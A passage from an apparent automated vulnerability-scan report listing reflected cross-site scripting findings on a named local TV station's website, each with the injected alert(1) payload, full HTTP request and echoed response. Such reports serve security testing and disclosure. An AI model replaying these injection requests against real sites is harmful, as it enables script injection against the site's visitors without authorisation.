Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:41:47 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 01:41:47 GMT
ETag: "4e87463754d1a8a716b7c9d3be1c9068-25715"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:41:47 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 25715

/* http://www.cbs6albany.com/common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page24549*/alert(1)//d473b38e549 */
   function loadPoll(pollid,sitecode)
   {
           var pollwrapper = document.getElementById('pollwrapper');
           var scriptname = "/onsetfeature/pollcap.php?station=" + sitecode;
           getPollResult(pollid,
...[SNIP]...

4.827. http://www.cbs6albany.com/common/tools/load.php [js parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/tools/load.php

Issue detail

The value of the js request parameter is copied into the HTML document as plain text between tags. The payload a475f<script>alert(1)</script>3024595e285 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/tools/load.php?js=a475f<script>alert(1)</script>3024595e285 HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:41:45 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 01:41:45 GMT
ETag: "7a19d1a13c57029e810a15327fa0ee7d-99"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:41:45 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 99

/* http://www.cbs6albany.com/common/tools/load.php?js=a475f<script>alert(1)</script>3024595e285 */

4.828. http://www.cbs6albany.com/common/tools/load.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 67037*/alert(1)//a0d841c9b61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page&67037*/alert(1)//a0d841c9b61=1 HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:43:10 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 01:43:10 GMT
ETag: "1d0c52853ddbe1f2f6ea7445acd94b09-26445"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:43:10 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 26445

/* http://www.cbs6albany.com/common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page&67037*/alert(1)//a0d841c9b61=1 */
   function loadPoll(pollid,sitecode)
   {
           var pollwrapper = document.getElementById('pollwrapper');
           var scriptname = "/onsetfeature/pollcap.php?station=" + sitecode;
           getPollResult(polli
...[SNIP]...

4.829. http://www.cbs6albany.com/common/tools/load.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e196f<script>alert(1)</script>3cfc0cbcbcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/tools/load.php?css=common_poll,common_layout_newspaper_nonav,common_nav,common_bcstyle,common_search,common_election,common_zvents,common_broadcast,site&e196f<script>alert(1)</script>3cfc0cbcbcf=1 HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:43:21 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 01:43:21 GMT
ETag: "0b17a42b1d2521257d3d09f126491899-80086"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:43:21 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/css
Content-Length: 80086

/* http://www.cbs6albany.com/common/tools/load.php?css=common_poll,common_layout_newspaper_nonav,common_nav,common_bcstyle,common_search,common_election,common_zvents,common_broadcast,site&e196f<script>alert(1)</script>3cfc0cbcbcf=1 */
.articlepoll #pollwrapper {
width:249px;
}

.pollbars {
   font-family: Arial, Helvetica;
   font-size: 10px;
   font-style: normal;
   color: #ffffff;
   background-color: #000066;
   line-height:
...[SNIP]...

4.830. http://www.cbs6albany.com/sections/abouthdtv/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/abouthdtv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 74765'><script>alert(1)</script>438a92d147a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/abouthdtv/?74765'><script>alert(1)</script>438a92d147a=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:27:07 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:37:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/abouthdtv/?74765'><script>alert(1)</script>438a92d147a=1'>
...[SNIP]...

4.831. http://www.cbs6albany.com/sections/contactus/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/contactus/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ffa76'><script>alert(1)</script>48177ec7652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/contactus/?ffa76'><script>alert(1)</script>48177ec7652=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:27:59 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:37:59 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/contactus/?ffa76'><script>alert(1)</script>48177ec7652=1'>
...[SNIP]...

4.832. http://www.cbs6albany.com/sections/contactus/newstips/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/contactus/newstips/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9651'><script>alert(1)</script>849d20d07f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/contactus/newstips/?c9651'><script>alert(1)</script>849d20d07f1=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:23 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:23 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 44060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/contactus/newstips/?c9651'><script>alert(1)</script>849d20d07f1=1'>
...[SNIP]...

4.833. http://www.cbs6albany.com/sections/employmentopportunities/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/employmentopportunities/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2930b'><script>alert(1)</script>bd162823394 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/employmentopportunities/?2930b'><script>alert(1)</script>bd162823394=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:32:17 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:42:17 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/employmentopportunities/?2930b'><script>alert(1)</script>bd162823394=1'>
...[SNIP]...

4.834. http://www.cbs6albany.com/sections/jobsonline/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/jobsonline/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9cfe9'><script>alert(1)</script>7666009c44c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/jobsonline/?9cfe9'><script>alert(1)</script>7666009c44c=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:32:52 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:42:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/jobsonline/?9cfe9'><script>alert(1)</script>7666009c44c=1'>
...[SNIP]...

4.835. http://www.cbs6albany.com/sections/live-cameras/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/live-cameras/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 129c2'><script>alert(1)</script>b7126808f47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/live-cameras/?129c2'><script>alert(1)</script>b7126808f47=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:00 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:00 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/live-cameras/?129c2'><script>alert(1)</script>b7126808f47=1'>
...[SNIP]...

4.836. http://www.cbs6albany.com/sections/local-news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/local-news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 73375'><script>alert(1)</script>a26b2e249d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/local-news/?73375'><script>alert(1)</script>a26b2e249d1=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:23 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:23 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 87796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/local-news/?73375'><script>alert(1)</script>a26b2e249d1=1'>
...[SNIP]...

4.837. http://www.cbs6albany.com/sections/local-sports/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/local-sports/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 33bcf'><script>alert(1)</script>7d78819feea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/local-sports/?33bcf'><script>alert(1)</script>7d78819feea=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

4.838. http://www.cbs6albany.com/sections/production-department/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/production-department/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c35d'><script>alert(1)</script>68cf49f6df8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/production-department/?9c35d'><script>alert(1)</script>68cf49f6df8=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:30:23 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:40:23 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/production-department/?9c35d'><script>alert(1)</script>68cf49f6df8=1'>
...[SNIP]...

4.839. http://www.cbs6albany.com/sections/publicfile/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/publicfile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93a58'><script>alert(1)</script>726a8db5fcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/publicfile/?93a58'><script>alert(1)</script>726a8db5fcf=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:52 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/publicfile/?93a58'><script>alert(1)</script>726a8db5fcf=1'>
...[SNIP]...

4.840. http://www.cbs6albany.com/sections/sales/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/sales/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42536'><script>alert(1)</script>808b664d1ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/sales/?42536'><script>alert(1)</script>808b664d1ae=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:13 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:13 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/sales/?42536'><script>alert(1)</script>808b664d1ae=1'>
...[SNIP]...

4.841. http://www.cbs6albany.com/sections/satellitewaivers/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/satellitewaivers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61465'><script>alert(1)</script>a06280160d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/satellitewaivers/?61465'><script>alert(1)</script>a06280160d2=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:52 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
